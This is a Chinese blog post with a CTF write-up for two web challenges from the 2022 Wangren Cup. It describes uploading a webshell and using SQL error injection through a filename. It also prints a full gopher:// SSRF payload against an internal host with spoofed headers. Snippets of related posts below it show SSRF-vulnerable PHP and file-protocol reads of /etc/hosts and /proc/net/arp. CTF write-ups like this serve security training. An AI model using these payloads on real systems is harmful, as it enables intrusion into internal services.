2022第二届网刃杯网络安全大赛-Web

已于 2023-12-18 17:24:46 修改
阅读量2.4k 收藏 13
点赞数 4
分类专栏: 2022第二届网刃杯网络安全大赛 文章标签: 网络安全 第二届网刃杯 web ctf
于 2022-04-25 10:20:01 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43264813/article/details/124398520
版权

2022第二届网刃杯网络安全大赛-Web

前言

提示:该内容由夜刃TEOT战队-夜白君师傅原创,禁止抄袭!

一、Web2-upload

难度系数:4.0
题目描述:只有想不到,没有做不到,sql yyds。题目链接见附件,每个链接均可访问,环境5分钟重启一次。

  1. 文件上传,随便上传一个马
    在这里插入图片描述
    在这里插入图片描述

  2. 使用Burp抓包
    在这里插入图片描述
    在这里插入图片描述

  3. 根据提示,更改类型
    在这里插入图片描述

  4. 上传文件
    在这里插入图片描述

  5. 查询到filename上传点,报错注入,获取FLAG
    在这里插入图片描述
    在这里插入图片描述

  6. flag{5937a0b90b5966939cccd369291c68aa}

二、Web3-Sign_in

难度系数:3.0
题目描述:炒鸡简单的签到题,玩的开心~~~~ 题目链接见附件,每个链接均可访问,环境5分钟重启一次。

  1. 通过ARP记录得到WEB地址

  2. IP: 172.73.24.100
    在这里插入图片描述

  3. 经过一步步的提示最终构造Payload 获取FLAG.
    在这里插入图片描述

  4. Payload:

http://124.220.9.19:20001/?
url=gopher://172.73.24.100:80/_POST%2520%252Findex.php%253Fa%253Dflag%2520HTTP%2 52F1.1%250D%250AHost%253A%2520172.73.24.100%250D%250AContent-
Type%253A%2520application%252Fx-www-form-urlencoded%250D%250AContent- Length%253A%252011%250D%250AX-FORWARDED-
FOR%253A%2520127.0.0.1%250D%250AREFERER%3A%20bolean.club%250D%250A%250D%250Ab%25 3Dflag%250D%250A

在这里插入图片描述

  1. flag{Have_A_GoOd_T1m3!!!}
夜白君
关注
  • 4
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
2022第二届网刃杯网络安全大赛题包
04-25
2022第二届网刃杯网络安全大赛题包
网刃杯 第二届 2022 web
weixin_43610673的博客
04-25 585
Sign_in File协议读取/etc/hosts得到内网ip http://探测内网主机 按照提示传参,添加http头即可,用gopher发送post数据 http://124.220.9.19:8091/?url=gopher://172.73.23.100:80/%5f%50%4f%53%54%25%32%30%2f%25%33%46%61%25%33%44%31%25%32%30%48%54%54%50%2f%31%2e%31%25%30%44%25%30%41%48%6f%73%74%
2022网刃杯
姜小孩的博客
05-06 1270
网刃杯2022 2022网刃杯
2022网刃杯web
羽的博客
04-25 1520
signin 源码如下 <?php highlight_file(__FILE__); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $_GET['url']); curl_setopt($ch, CURLOPT_HEADER, 0); curl_exec($ch); curl_close($ch); ?> 很明显的ssrf漏洞。用dict协议探测了下3306、6379、9000端口。应该是都没
2022第二届网刃杯网络安全大赛 MISC-玩坏的winxp 详细解题过程。
04-25
本文主要讲述了参加2022第二届网刃杯网络安全大赛MISC类别中“玩坏的winxp”解题的过程,这是一道涉及Windows XP系统、数据恢复、文件隐藏与加密的综合题目。难度系数为4.0,挑战者需要具备一定的网络安全技能,...
河南省第一届职业技能大赛网络安全赛项试题-B模块 -2.docx
03-02
本资源是河南省第一届职业技能大赛网络安全赛项试题-B模块,涵盖了多个网络安全相关的知识点,包括操作系统渗透测试、中间件渗透测试、Web 安全应用、数据分析取证与图片隐写等。 1. Linux 操作系统渗透测试 ...
CTF - 第二届“陇剑杯”网络安全大赛线上赛部分write up
最新发布
08-26
CTF-第二届“陇剑杯”网络安全大赛线上赛部分write up 本篇文章将围绕第二届“陇剑杯”网络安全大赛线上赛的 Write-up 进行详细的讲解,从中可以学到许多实用的网络安全知识。 首先,我们来看一下第一个题目,黑客...
广东大学生网络安全攻防大赛(题目附件-剩下的)
05-25
该文件包含了比赛上本人没做出来的题目的附件
2022第二届网刃杯网络安全大赛
tlovejr的博客
05-06 2990
前言 前段时间在机缘巧合下参加了这次的比赛,距离比赛结束也有一星期的时间,现在把部分题解给大家说一下 一、ICS1-ncsubj 1、首先先打开数据包进行查看,并追踪一下tcp流看看有没有什么收获信息 2、在上图可以看到,有3段被分开的base64编码,那就直接合起来解密 anx1fG58Z3xufGF8cHxmfGh8b3x3fHJ8cHxnfA== j|u|n|g|n|a|p|f|h|o|w|r|p|g| 3、发现上面还是有加密,同事大神说这个其实随波逐流解码,那就直接利用软件
2021第一届网刃杯网络安全大赛.zip
09-13
2021第一届网刃杯网络安全大赛.zip
第二届网刃杯 WEB
qq_53263789的博客
04-26 395
Sign_in 一道SSRF 看一下网络情况 http://124.222.173.163:20003/?url=file:///proc/net/arp 访问一下 100,因为长的奇怪 绕后就是添加一下XFF,Ref头信息,gopher打过去就好 exp import urllib.parse payload =\ """ POST /?a=1 HTTP/1.1 Host: bolean.club Content-Type: application/x-www-form-urlencoded Co
CTF竞赛入门(二)WEB 安全
single7_的博客
11-17 825
web 安全 概述 信息收集 HTTP/JSP 代码审计 SQL注入 XSS利用 文件包含 文件上传 CMS漏洞利用 web安全实验环境 PHP环境:phpstudy JAVA环境:jdk python环境:python3/2.7,anaconda,activepython 安全工具的使用 sqlmap SQLMap 是一个开源的渗透测试工具,可以用来进行自动化检测,利用 SQL 注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储
2023年网络安全比赛--Web渗透测试国赛篇(超详细)
Aluxian_的博客
06-29 2502
2023网络安全解析 国赛篇2380
中职网络安全比赛之Web综合渗透测试
cike_y
02-17 1037
一次关于关于中职比赛题目的web渗透页面的笔记,有什么不懂的都可以找我。
2020全国信息安全大赛 web之trick
Firebasky的博客
08-22 741
参加了国赛,才发现自己太菜了,自己做的时候不会 一看别人wp,cm!。正所谓赛后诸葛亮,今天自己也来总结一下这道题 上源代码 <?php class trick{ public $a; public $b; public function __destruct(){ $this->a = (string)$this->a; if(strlen($this->a) > 5 || strlen($this->b) &.
第二届网刃杯部分wp
Sentiment的博客
04-26 2491
Sign_in 题目描述:炒鸡简单的签到题,玩的开心~~~~ 题目链接见附件,每个链接均可访问,环境5分钟重启一次。 file协议访问/etc/hosts,发现内网ip 扫描c段,发现127.73.23.100存活,需要GET传参一个a http://124.222.24.150:8091/?url=172.73.23.100 传a提示需要POST传b,这里的b,是指在172.73.23.100中传b,而当前host是:124.222.24.150,所以这里用到了gopher协议的POST传参 构造
2021第一届网刃杯网络安全大赛-baby-usb
qq_43264813的博客
09-13 681
2021第一届网刃杯网络安全大赛-baby-usb 难度系数:4.0 题目描述:黑客捕获到了某台电脑的设备流量,请帮忙分析可疑数据。 解题思路: 查看流量包并分析发现为键盘流量,从互联上找取脚本进行批量爬取键盘流量 将所爬取的流量做为文档密码进行解密 ...
网刃杯MISC-玩坏的winxp解题过程详解
"2022第二届网刃杯网络安全大赛 MISC-玩坏的winxp 详细解题过程" 本文将详细讲解2022第二届网刃杯网络安全大赛MISC-玩坏的winxp题目的解题过程,涵盖了Windows XP Professional虚拟机的修复、文件恢复、隐藏文件...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

夜白君

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值